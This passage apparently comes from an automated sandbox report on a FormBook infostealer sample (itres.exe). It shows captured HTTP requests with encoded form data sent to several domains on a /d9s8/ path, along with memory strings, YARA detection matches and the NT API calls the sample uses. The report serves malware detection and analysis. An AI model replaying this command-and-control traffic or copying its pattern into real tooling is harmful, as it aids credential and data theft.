  POST /d9s8/ HTTP/1.1
  Host: www.23works.com
  Connection: close
  Content-Length: 409
  Cache-Control: no-cache
  Origin: http://www.23works.com
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Content-Type: application/x-www-form-urlencoded
  Accept: */*
  Referer: http://www.23works.com/d9s8/
  Accept-Language: en-US
  Accept-Encoding: gzip, deflate
  Data Raw: (hex of the Data Ascii body below, followed by eight 0x00 bytes)
  Data Ascii: 2de=N3NnnE44IEqFR1OoI8FmyyvVRJs9ZFgHag1u6VP0S4r90-j1XaIAGfr2UKFgRTE-HrmhQHDl99d6XeCz8lbUOoKPX42t9insIJNJ9zKV5pZIvcwAjyUSPbirjmu1TClkPZNFI-6Vph93qurMlXd6WQfgqivVk7kfbD56XIjPQ2BwmPfdgpQZ4JVvf3pPPCYX5sxazBxrTuHU7mSFeINI2_HrIxfXk6lBwFINaLnbUkiq(50ye5MFpIdFX2rD9yGLK7j1KplMSa6DTc7qsTa7y53BoVyqjODOTqTMTGjPw9oTxPDgLyt7htNgxCqgYpcxzXQAmtnSuFKY60j978FQ7_5_~VBxGXn2D8ZX~A(Qz_qgNj~7i3JVCgqvHQUbj4BGgUQuIoE1tQ9BXdaIzw).
Source: global traffic | HTTP traffic detected:
  POST /d9s8/ HTTP/1.1
  Host: www.nittayabeauty.com
  Connection: close
  Content-Length: 409
  Cache-Control: no-cache
  Origin: http://www.nittayabeauty.com
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Content-Type: application/x-www-form-urlencoded
  Accept: */*
  Referer: http://www.nittayabeauty.com/d9s8/
  Accept-Language: en-US
  Accept-Encoding: gzip, deflate
  Data Raw: (hex of the Data Ascii body below, followed by eight 0x00 bytes)
  Data Ascii: 2de=rwtpJZ1lpXXjDgVI3O4awr7lI_QWya31oP3HPeeiGunubAyhH3NjpfmCgVN1Va5zdQJg(Ke2d4JrauwaW6bGEhzN17dvZ63lzL5lUrCLVJ2Y(gQHxo4pNR0W7cDzGuEaa9G1N-E6u_jEk2o86saz9fC5X6QZN6N0j4qMEPADX6KwX3Ug20m5VVpedQk6HdjpKnMN8AXuf9GoaLghWePHxAUwzxBckLE70VvGAw(P8Ig-pKpzGLM3SHaI1UqAo26lDSoR6m6WiYjpqYoB9THmM-8kCDeAlNUtTxaFNPrZ~rfM1FA_ABNj(C2nz74qvbP_Q1AOOwWFO3LQo15FT7wX2PQyg-NPds~K9SeiwHT-(QM4Qkuj4nnJSwOfMak03Dvk7sf2UGmGTutz9L0tyQ).
Source: global traffic | HTTP traffic detected:
  POST /d9s8/ HTTP/1.1
  Host: www.keebcat.com
  Connection: close
  Content-Length: 409
  Cache-Control: no-cache
  Origin: http://www.keebcat.com
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Content-Type: application/x-www-form-urlencoded
  Accept: */*
  Referer: http://www.keebcat.com/d9s8/
  Accept-Language: en-US
  Accept-Encoding: gzip, deflate
  Data Raw: (hex of the Data Ascii body below, followed by eight 0x00 bytes)
  Data Ascii: 2de=TMAh0Ao_FuFZFpYwBcvaWKeFlYJSS0yBMqpV(j8GeLvwOoZVCVv4s8dH~qPD9qWGN1VEswTK7Wj7F6zgB_Vsjsk_1bDt4EtEKBOZT8Z0Gb1oN4imx2v6fX38gWuLG3DLkBVP4_xaF01YoXE4fw(RCPFE228Sj-AAI35eJqiQsP2mNGBDqM~XVdYCGGiiTWDLgZ1ULbgqxjCo~sHXjWfb9NxLxp8vsjwJIIfoH4r8HKFtUn1_Y0oN7lKApGpHNpLm~Am269lv2g4tp_P9rEBpaPHGd7LBnetYncSlhJCCvtCm51BgbAyDXEzG3rq3~1oYWzmkHe0VlmviYRGWb-CNfCnIpp(KU1dCYn44LSPZtjfmKwPDIBgtns4lGmC8M2zORNd30usaq6xUtts1uw).
Source: global traffic | HTTP traffic detected:
  POST /d9s8/ HTTP/1.1
  Host: www.ashleygrady.com
  Connection: close
  Content-Length: 409
  Cache-Control: no-cache
  Origin: http://www.ashleygrady.com
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Content-Type: application/x-www-form-urlencoded
  Accept: */*
  Referer: http://www.ashleygrady.com/d9s8/
  Accept-Language: en-US
  Accept-Encoding: gzip, deflate
  Data Raw: (hex of the Data Ascii body below, followed by eight 0x00 bytes)
  Data Ascii: 2de=5zFbd2KHg6tlb4pBVMD3FLj4MmvyMs7fYbxqDZ~t2N~VoQ3BlX38izifawCb(pNYa50f0n5s~iB40_3Vexcg6VC6IYY-i_kOxbVkCozEU5spQmHhWR4rmRof8hls4EajoHBxO6koU8MtRnRMvYRGuBRxX-sEElgShbAR9wMKZ33MVR5pFkTFk8Sa3Sc6IgpCqi5eeTV-i4QibZJzxKUyUBAd6R7kHu7oYw5SZoLHCrp6gsrVgIgviiKXMLs4T5FP2PB92rtKNBb1~BJfaF(kAtCY6m1OVO1NaB3HkHIp8RWZX0gQ6VHLqo2aQvBw0vXuvvin6xBRYEu7AmRF1brQhnG6u1FCfwsZL1ZuJuHDs5TUL70NwDNHWUR_k3~w(ZTWdA~b1rMaCytl07Qbng).
Source: global traffic | HTTP traffic detected:
  POST /d9s8/ HTTP/1.1
  Host: www.clicrhonealpes.com
  Connection: close
  Content-Length: 409
  Cache-Control: no-cache
  Origin: http://www.clicrhonealpes.com
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Content-Type: application/x-www-form-urlencoded
  Accept: */*
  Referer: http://www.clicrhonealpes.com/d9s8/
  Accept-Language: en-US
  Accept-Encoding: gzip, deflate
  Data Raw: 32 64 65 3d 53 34 64 2d 58 57 65 72 4a 79 4e 59 71 63 39 53 72 34 59 45 39 4d 52 6e 74 39 41 55 50 6b 62 4c 72 45 41 75 7e 76 4c 57 34 67 61 6a 35 59 49 55 47 47 58 6d 6b 74 4f 6c 52 76 72 4d 48 72 7a 35 42 78 39 47 41 79 58 5f 39 61 44 31 54 35 4b 75 30 7a 65 66 7a 46 6b 4f 67 68 6d 78 69 4c 39 2d 58 67 68 33 53 6d 30 62 74 55 67 79 45 65 31 65 6e 43 45 71 4a 37 75 75 6b 70 44 72 68 45 50 74 65 68 77 6c 75 39 37 4d 6b 57 59 34 64 31 4e 6e 45 4b 55 5f 59 6c 55 63 49 65 35 46 70 6a 56 45 73 30 56 4c 6b 36 6d 56 61 41 74 5a 69 76 44 5f 67 77 64 6b 4a 5a 6e 68 61 58 4e 4b 41 4b 4c 78 68 4f 4e 59 54 57 6e 67 54 52 79 49 32 51 72 76 4a 41 6c 5a 73 63 79 75 44 51 4d 5a 4c 4e 53 61 32 4e 41 43 36 6f 6f 63 51 2d 39 54 54 7a 39 6c 69 6a 33 32 65 46 55 4c 62 6c 69 53 43 31 58 56 37 6d 34 55 6c 5a 30 2d 36 76 6d 65 62 74 7a 48 47 5f 55 44 73 55 63 59 4d 68 4b 46 53 52 4f 52 70 43 73 6b 6e 66 67 6f 54 6c 30 64 55 57 4d 61 62 65 7e 43 36 5f 67 7a 74 30 28 34 62 68 72 65 66 31 67 36 79 4e 61 6b 54 4d 4f 36 4c 37 37 37 52 58 51 34 6d 43 46 75 77 70 41 4e 7a 53 6d 64 6b 49 56 75 48 43 28 79 57 31 31 41 45 56 30 70 79 33 53 51 67 46 77 44 4e 43 6f 68 71 58 66 6f 61 55 56 4e 71 36 78 52 6e 50 69 63 61 37 6a 6b 6a 77 29 2e 00 00 00 00 00 00 00 00
2de=S4d-XWerJyNYqc9Sr4YE9MRnt9AUPkbLrEAu~vLW4gaj5YIUGGXmktOlRvrMHrz5Bx9GAyX_9aD1T5Ku0zefzFkOghmxiL9-Xgh3Sm0btUgyEe1enCEqJ7uukpDrhEPtehwlu97MkWY4d1NnEKU_YlUcIe5FpjVEs0VLk6mVaAtZivD_gwdkJZnhaXNKAKLxhONYTWngTRyI2QrvJAlZscyuDQMZLNSa2NAC6oocQ-9TTz9lij32eFULbliSC1XV7m4UlZ0-6vmebtzHG_UDsUcYMhKFSRORpCsknfgoTl0dUWMabe~C6_gzt0(4bhref1g6yNakTMO6L777RXQ4mCFuwpANzSmdkIVuHC(yW11AEV0py3SQgFwDNCohqXfoaUVNq6xRnPica7jkjw).
          Source: global traffic | HTTP traffic detected: GET /d9s8/?2de=0JLOdGg1pxN6Gt1Bi/JSJ+sGVc5LpPYI1jRUQtJxPcLLDPheB182/GB7jVB+9emH0R5P&2dGH_=lhdDpBZXt0P HTTP/1.1; Host: www.brasserie-lafayette.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /d9s8/?2de=dLiHs7tqNZzpikHCi85ytJ6zSazBJfKYHrDOt6j0CIH249LGHEOsf8+JajlTyMmOo22K&2dGH_=lhdDpBZXt0P HTTP/1.1; Host: www.isabellelinhnguyen.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /d9s8/?2de=3ubZ5tRrxIfN41eqqpIj22VrlW9j75JM4xICI34kih2i+rqjsIMd825CVukfAvIDWxA7&2dGH_=lhdDpBZXt0P HTTP/1.1; Host: www.smalltownlawns.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /d9s8/?2de=06wv+NhoHjlhWQUEJX2w+vK/IFNJKXsiSbpyW5561s6/I+0VZrqwpkfEjA0pYsAdDrMj&2dGH_=lhdDpBZXt0P HTTP/1.1; Host: www.thebardi.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /d9s8/?2de=/wmggT2FDua6/uf0m8vYUW9XM6JdOK3pq1DkZ95mxMYTiU7Z21xlQY1juaca7pTz06oP&2dGH_=lhdDpBZXt0P HTTP/1.1; Host: www.connerparty.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /d9s8/?2de=HNt6bE8MfKrAhK/pt1sF0411gOBLJ9Uo/gJYn3fY8ue0UhpQnU4ulW+T1HyKj92Df3q0&2dGH_=lhdDpBZXt0P HTTP/1.1; Host: www.nola3d.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /d9s8/?2de=C15d5iwTKlKsI3rAXZsLwlTuGsAeQEM+ckQv/EOsC4DDktzSY592Fv+KLrtwSAQYGPi+&2dGH_=lhdDpBZXt0P HTTP/1.1; Host: www.23works.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /d9s8/?2de=kyZTX99LiW/icy84gI8HitXVOdgKxOvA9fmCXsGAN7TtQxOyGGUpuanA939oWYtlCk9w&2dGH_=lhdDpBZXt0P HTTP/1.1; Host: www.nittayabeauty.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /d9s8/?2de=cO0bqnodE8Uodepscc2XXc+fybp4dBOkcNItlx0mXpHFPbxkNxOWsoUK9bPA0ZyiUQJd&2dGH_=lhdDpBZXt0P HTTP/1.1; Host: www.keebcat.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /d9s8/?2de=2xxhDTKogYVwMqkKCpG9QsOba3/Ca+nzIrlpYJOr5IqlgQrpv0G7wV/gFR/144BWYfki&2dGH_=lhdDpBZXt0P HTTP/1.1; Host: www.ashleygrady.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /d9s8/?2de=d6pEJxSdPSBH0MIO1uNgncpVh40baHTR/jhPmc3N2xeTp5EUHVGtu5D3SsniCJrPBB9M&2dGH_=lhdDpBZXt0P HTTP/1.1; Host: www.clicrhonealpes.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
          Source: unknown | DNS traffic detected: queries for: www.brasserie-lafayette.com
          Source: unknown | HTTP traffic detected: POST /d9s8/ HTTP/1.1; Host: www.isabellelinhnguyen.com; Connection: close; Content-Length: 409; Cache-Control: no-cache; Origin: http://www.isabellelinhnguyen.com; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko; Content-Type: application/x-www-form-urlencoded; Accept: */*; Referer: http://www.isabellelinhnguyen.com/d9s8/; Accept-Language: en-US; Accept-Encoding: gzip, deflate
          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found; Date: Fri, 18 Sep 2020 09:01:24 GMT; Server: Apache; Upgrade: h2,h2c; Connection: Upgrade, close; Accept-Ranges: bytes; Vary: Accept-Encoding,User-Agent; Content-Encoding: gzip; Content-Length: 857; Content-Type: text/html
          Source: itres.exe | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
          Source: itres.exe | String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
          Source: itres.exe | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
          Source: itres.exe | String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
          Source: itres.exe | String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
          Source: itres.exe | String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
          Source: explorer.exe, 00000002.00000000.204099784.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
          Source: systray.exe, 00000004.00000002.443050770.0000000004F9D000.00000004.00000001.sdmp | String found in binary or memory: http://i1.cdn-image.com/__media__/pics/12471/kwbg.jpg)
          Source: systray.exe, 00000004.00000002.443050770.0000000004F9D000.00000004.00000001.sdmp | String found in binary or memory: http://i1.cdn-image.com/__media__/pics/12471/libg.png)
          Source: systray.exe, 00000004.00000002.443050770.0000000004F9D000.00000004.00000001.sdmp | String found in binary or memory: http://i1.cdn-image.com/__media__/pics/12471/search-icon.png)
          Source: systray.exe, 00000004.00000002.443050770.0000000004F9D000.00000004.00000001.sdmp | String found in binary or memory: http://i2.cdn-image.com/__media__/js/min.js?v2.2
          Source: systray.exe, 00000004.00000002.443050770.0000000004F9D000.00000004.00000001.sdmp | String found in binary or memory: http://i3.cdn-image.com/__media__/pics/12471/arrow.png)
          Source: systray.exe, 00000004.00000002.443050770.0000000004F9D000.00000004.00000001.sdmp | String found in binary or memory: http://i3.cdn-image.com/__media__/pics/12471/bodybg.png)
          Source: systray.exe, 00000004.00000002.443050770.0000000004F9D000.00000004.00000001.sdmp | String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.eot
          Source: systray.exe, 00000004.00000002.443050770.0000000004F9D000.00000004.00000001.sdmp | String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.eot?#iefix
          Source: systray.exe, 00000004.00000002.443050770.0000000004F9D000.00000004.00000001.sdmp | String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.otf
          Source: systray.exe, 00000004.00000002.443050770.0000000004F9D000.00000004.00000001.sdmp | String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.svg#ubuntu-b
          Source: systray.exe, 00000004.00000002.443050770.0000000004F9D000.00000004.00000001.sdmp | String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.ttf
          Source: systray.exe, 00000004.00000002.443050770.0000000004F9D000.00000004.00000001.sdmp | String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.woff
          Source: systray.exe, 00000004.00000002.443050770.0000000004F9D000.00000004.00000001.sdmp | String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.woff2
          Source: systray.exe, 00000004.00000002.443050770.0000000004F9D000.00000004.00000001.sdmp | String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.eot
          Source: systray.exe, 00000004.00000002.443050770.0000000004F9D000.00000004.00000001.sdmp | String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.eot?#iefix
          Source: systray.exe, 00000004.00000002.443050770.0000000004F9D000.00000004.00000001.sdmp | String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.otf
          Source: systray.exe, 00000004.00000002.443050770.0000000004F9D000.00000004.00000001.sdmp | String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.svg#ubuntu-r
          Source: systray.exe, 00000004.00000002.443050770.0000000004F9D000.00000004.00000001.sdmp | String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.ttf
          Source: systray.exe, 00000004.00000002.443050770.0000000004F9D000.00000004.00000001.sdmp | String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.woff
          Source: systray.exe, 00000004.00000002.443050770.0000000004F9D000.00000004.00000001.sdmp | String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.woff2
          Source: systray.exe, 00000004.00000002.443050770.0000000004F9D000.00000004.00000001.sdmp | String found in binary or memory: http://i4.cdn-image.com/__media__/pics/12471/libgh.png)
          Source: systray.exe, 00000004.00000002.443050770.0000000004F9D000.00000004.00000001.sdmp | String found in binary or memory: http://i4.cdn-image.com/__media__/pics/12471/logo.png)
          Source: itres.exe | String found in binary or memory: http://ocsp.digicert.com0C
          Source: itres.exe | String found in binary or memory: http://ocsp.digicert.com0O
          Source: systray.exe, 00000004.00000002.443050770.0000000004F9D000.00000004.00000001.sdmp | String found in binary or memory: http://winp112727.myorderbox.com/linkhandler/servlet/RenewDomainServlet?validatenow=false&amp;orderi
          Source: explorer.exe, 00000002.00000000.204099784.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000002.00000000.204099784.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000002.00000000.204099784.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000002.00000000.204099784.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000002.00000000.204099784.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000002.00000000.204099784.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000002.00000000.204099784.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000002.00000000.204099784.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000002.00000000.204099784.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000002.00000000.204099784.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000002.00000000.204099784.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000002.00000000.204099784.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000002.00000000.204099784.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000002.00000000.204099784.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000002.00000000.204099784.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000002.00000000.204099784.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000002.00000000.204099784.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000002.00000000.204099784.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: systray.exe, 00000004.00000002.443050770.0000000004F9D000.00000004.00000001.sdmp | String found in binary or memory: http://www.nittayabeauty.com/Anti_Wrinkle_Creams.cfm?fp=%2BIsPvnki%2Bc5Lile4ORnau4eJbEr8E2bcfXoDunQ1
          Source: systray.exe, 00000004.00000002.443050770.0000000004F9D000.00000004.00000001.sdmp | String found in binary or memory: http://www.nittayabeauty.com/Cheap_Air_Tickets.cfm?fp=%2BIsPvnki%2Bc5Lile4ORnau4eJbEr8E2bcfXoDunQ1jo
          Source: systray.exe, 00000004.00000002.443050770.0000000004F9D000.00000004.00000001.sdmp | String found in binary or memory: http://www.nittayabeauty.com/Health_Insurance.cfm?fp=%2BIsPvnki%2Bc5Lile4ORnau4eJbEr8E2bcfXoDunQ1joK
          Source: systray.exe, 00000004.00000002.443050770.0000000004F9D000.00000004.00000001.sdmp | String found in binary or memory: http://www.nittayabeauty.com/Online_classifieds.cfm?fp=%2BIsPvnki%2Bc5Lile4ORnau4eJbEr8E2bcfXoDunQ1j
          Source: systray.exe, 00000004.00000002.443050770.0000000004F9D000.00000004.00000001.sdmp | String found in binary or memory: http://www.nittayabeauty.com/Parental_Control.cfm?fp=%2BIsPvnki%2Bc5Lile4ORnau4eJbEr8E2bcfXoDunQ1joK
          Source: systray.exe, 00000004.00000002.443050770.0000000004F9D000.00000004.00000001.sdmp | String found in binary or memory: http://www.nittayabeauty.com/Top_10_Luxury_Cars.cfm?fp=%2BIsPvnki%2Bc5Lile4ORnau4eJbEr8E2bcfXoDunQ1j
          Source: systray.exe, 00000004.00000002.443050770.0000000004F9D000.00000004.00000001.sdmp | String found in binary or memory: http://www.nittayabeauty.com/d9s8/?2de=kyZTX99LiW/icy84gI8HitXVOdgKxOvA9fmCXsGAN7TtQxOyGGUpuanA939oW
          Source: systray.exe, 00000004.00000002.443050770.0000000004F9D000.00000004.00000001.sdmp | String found in binary or memory: http://www.nittayabeauty.com/display.cfm
          Source: systray.exe, 00000004.00000002.443050770.0000000004F9D000.00000004.00000001.sdmp | String found in binary or memory: http://www.nittayabeauty.com/find_a_tutor.cfm?fp=%2BIsPvnki%2Bc5Lile4ORnau4eJbEr8E2bcfXoDunQ1joKj137
          Source: systray.exe, 00000004.00000002.443050770.0000000004F9D000.00000004.00000001.sdmp | String found in binary or memory: http://www.nittayabeauty.com/px.js?ch=1
          Source: systray.exe, 00000004.00000002.443050770.0000000004F9D000.00000004.00000001.sdmp | String found in binary or memory: http://www.nittayabeauty.com/px.js?ch=2
          Source: systray.exe, 00000004.00000002.443050770.0000000004F9D000.00000004.00000001.sdmp | String found in binary or memory: http://www.nittayabeauty.com/sk-logabpstatus.php?a=M0RsYjFCcHhWaHlBWXk1TjYySVZRdC9GazNTNTJEUityOHdJK
          Source: explorer.exe, 00000002.00000000.204099784.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000002.00000000.204099784.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000002.00000000.204099784.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000002.00000000.204099784.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000002.00000000.204099784.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000002.00000000.204099784.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000002.00000000.204099784.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
          Source: systray.exe, 00000004.00000002.443050770.0000000004F9D000.00000004.00000001.sdmp | String found in binary or memory: https://www.clicrhonealpes.com/d9s8/?2de=d6pEJxSdPSBH0MIO1uNgncpVh40baHTR/jhPmc3N2xeTp5EUHVGtu5D3Ssn
          Source: itres.exe | String found in binary or memory: https://www.digicert.com/CPS0

          E-Banking Fraud:

          Yara detected FormBook
          Source: Yara match | File source: 00000001.00000002.220821810.0000000000D10000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000002.220868962.0000000000D70000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.440762612.00000000003A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.183941940.000000000365A000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.441684178.0000000002E70000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.183747077.00000000035AC000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000002.220483499.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 1.2.itres.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.2.itres.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 00000001.00000002.220821810.0000000000D10000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.220821810.0000000000D10000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.220868962.0000000000D70000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.220868962.0000000000D70000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.440762612.00000000003A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.440762612.00000000003A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.183941940.000000000365A000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.183941940.000000000365A000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.441684178.0000000002E70000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.441684178.0000000002E70000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.183747077.00000000035AC000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.183747077.00000000035AC000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.220483499.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.220483499.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.itres.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.itres.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.itres.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.itres.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\itres.exeCode function: 0_2_00A5C404 NtSetInformationThread,0_2_00A5C404
          Source: C:\Users\user\Desktop\itres.exeCode function: 0_2_00A5C402 NtSetInformationThread,0_2_00A5C402
          Source: C:\Users\user\Desktop\itres.exeCode function: 0_2_00A5CD82 NtSetInformationThread,0_2_00A5CD82
          Source: C:\Users\user\Desktop\itres.exeCode function: 1_2_00417930 NtCreateFile,1_2_00417930
          Source: C:\Users\user\Desktop\itres.exeCode function: 1_2_004179E0 NtReadFile,1_2_004179E0
          Source: C:\Users\user\Desktop\itres.exeCode function: 1_2_00417A60 NtClose,1_2_00417A60
          Source: C:\Users\user\Desktop\itres.exeCode function: 1_2_00417B10 NtAllocateVirtualMemory,1_2_00417B10
          Source: C:\Users\user\Desktop\itres.exeCode function: 1_2_004179DA NtReadFile,1_2_004179DA
          Source: C:\Users\user\Desktop\itres.exeCode function: 1_2_00417987 NtReadFile,1_2_00417987
